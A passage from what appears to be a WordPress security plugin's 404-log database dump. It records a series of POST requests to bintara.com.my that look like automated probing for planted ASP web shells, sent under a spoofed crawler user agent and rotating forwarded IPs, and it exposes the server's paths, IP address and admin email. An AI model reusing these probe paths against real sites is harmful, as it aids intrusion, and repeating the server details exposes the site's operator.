Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"218.22.37.14\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"218.22.37.14\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/login.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/admin/login.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4stOAgYuZ1@aLzbZgP-wAAAJU\";s:12:\"REDIRECT_URL\";s:16:\"/admin/login.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"55353\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/login.asp\";s:10:\"SCRIPT_URL\";s:16:\"/admin/login.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4stOAgYuZ1@aLzbZgP-wAAAJU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571695796.488\";s:12:\"REQUEST_TIME\";s:10:\"1571695796\";}}','notice','2019-10-21 22:09:58','2019-10-21 22:09:56',35340264,37133496,'http://bintara.com.my//admin/login.asp',1,0,'218.22.37.14'),(28655,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//admin/login.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"222.31.81.217\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"222.31.81.217\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/login.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/admin/login.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4sueAgYuZ1@aLzbZgQAAAAAIs\";s:12:\"REDIRECT_URL\";s:16:\"/admin/login.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"55353\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/login.asp\";s:10:\"SCRIPT_URL\";s:16:\"/admin/login.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4sueAgYuZ1@aLzbZgQAAAAAIs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571695801.8494\";s:12:\"REQUEST_TIME\";s:10:\"1571695801\";}}','notice','2019-10-21 22:10:03','2019-10-21 22:10:02',35270176,37074280,'http://bintara.com.my//admin/login.asp',1,0,'222.31.81.217'),(28656,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//zhuce/inc/dgs.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"817\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"218.244.0.44\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"218.244.0.44\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/zhuce/inc/dgs.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/zhuce/inc/dgs.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4syeAgYuZ1@aLzbZgQCAAAAIQ\";s:12:\"REDIRECT_URL\";s:18:\"/zhuce/inc/dgs.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"55353\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/zhuce/inc/dgs.asp\";s:10:\"SCRIPT_URL\";s:18:\"/zhuce/inc/dgs.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4syeAgYuZ1@aLzbZgQCAAAAIQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571695817.1457\";s:12:\"REQUEST_TIME\";s:10:\"1571695817\";}}','notice','2019-10-21 22:10:19','2019-10-21 22:10:17',35336000,37135280,'http://bintara.com.my//zhuce/inc/dgs.asp',1,0,'218.244.0.44'),(28657,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//zhuce/inc/dgs.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"682\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"221.174.4.21\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"221.174.4.21\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/zhuce/inc/dgs.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/zhuce/inc/dgs.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4szeAgYuZ1@aLzbZgQCQAAAJE\";s:12:\"REDIRECT_URL\";s:18:\"/zhuce/inc/dgs.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"55353\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/zhuce/inc/dgs.asp\";s:10:\"SCRIPT_URL\";s:18:\"/zhuce/inc/dgs.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4szeAgYuZ1@aLzbZgQCQAAAJE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571695821.5299\";s:12:\"REQUEST_TIME\";s:10:\"1571695821\";}}','notice','2019-10-21 22:10:23','2019-10-21 22:10:21',35268112,37064552,'http://bintara.com.my//zhuce/inc/dgs.asp',1,0,'221.174.4.21'),(28658,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//Include/showpa.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"220.207.246.207\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"220.207.246.207\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/Include/showpa.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/Include/showpa.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4tG6jZzpoQqaKQA3IwLwAAANc\";s:12:\"REDIRECT_URL\";s:19:\"/Include/showpa.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"59777\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/Include/showpa.asp\";s:10:\"SCRIPT_URL\";s:19:\"/Include/showpa.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4tG6jZzpoQqaKQA3IwLwAAANc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571695899.8582\";s:12:\"REQUEST_TIME\";s:10:\"1571695899\";}}','notice','2019-10-21 22:11:42','2019-10-21 22:11:40',35736432,37538592,'http://bintara.com.my//Include/showpa.asp',1,0,'220.207.246.207'),(28659,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//Include/showpa.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"123.56.64.215\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"123.56.64.215\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/Include/showpa.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/Include/showpa.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4tI6jZzpoQqaKQA3IwMAAAAMU\";s:12:\"REDIRECT_URL\";s:19:\"/Include/showpa.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"59777\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/Include/showpa.asp\";s:10:\"SCRIPT_URL\";s:19:\"/Include/showpa.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4tI6jZzpoQqaKQA3IwMAAAAMU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571695907.4699\";s:12:\"REQUEST_TIME\";s:10:\"1571695907\";}}','notice','2019-10-21 22:11:49','2019-10-21 22:11:47',35264976,37063400,'http://bintara.com.my//Include/showpa.asp',1,0,'123.56.64.215'),(28660,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//adv_web/0909/c.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"122.13.224.14\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"122.13.224.14\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/adv_web/0909/c.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/adv_web/0909/c.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4tJqjZzpoQqaKQA3IwMQAAAMc\";s:12:\"REDIRECT_URL\";s:19:\"/adv_web/0909/c.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"59777\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/adv_web/0909/c.asp\";s:10:\"SCRIPT_URL\";s:19:\"/adv_web/0909/c.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4tJqjZzpoQqaKQA3IwMQAAAMc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571695910.7849\";s:12:\"REQUEST_TIME\";s:10:\"1571695910\";}}','notice','2019-10-21 22:11:52','2019-10-21 22:11:51',35340000,37151024,'http://bintara.com.my//adv_web/0909/c.asp',1,0,'122.13.224.14'),(28661,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//adv_web/0909/c.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"219.246.187.65\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"219.246.187.65\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/adv_web/0909/c.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/adv_web/0909/c.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4tLKjZzpoQqaKQA3IwMgAAAMo\";s:12:\"REDIRECT_URL\";s:19:\"/adv_web/0909/c.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"59777\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/adv_web/0909/c.asp\";s:10:\"SCRIPT_URL\";s:19:\"/adv_web/0909/c.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4tLKjZzpoQqaKQA3IwMgAAAMo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571695916.1436\";s:12:\"REQUEST_TIME\";s:10:\"1571695916\";}}','notice','2019-10-21 22:11:58','2019-10-21 22:11:56',35267600,37078744,'http://bintara.com.my//adv_web/0909/c.asp',1,0,'219.246.187.65'),(28662,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//base/js/shi.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"202.97.32.253\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"202.97.32.253\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/base/js/shi.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/base/js/shi.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4tQajZzpoQqaKQA3IwOwAAANI\";s:12:\"REDIRECT_URL\";s:16:\"/base/js/shi.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"59777\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/base/js/shi.asp\";s:10:\"SCRIPT_URL\";s:16:\"/base/js/shi.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4tQajZzpoQqaKQA3IwOwAAANI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571695937.9211\";s:12:\"REQUEST_TIME\";s:10:\"1571695937\";}}','notice','2019-10-21 22:12:20','2019-10-21 22:12:18',35340768,37134792,'http://bintara.com.my//base/js/shi.asp',1,0,'202.97.32.253'),(28663,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//UploadFiles/1l.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; 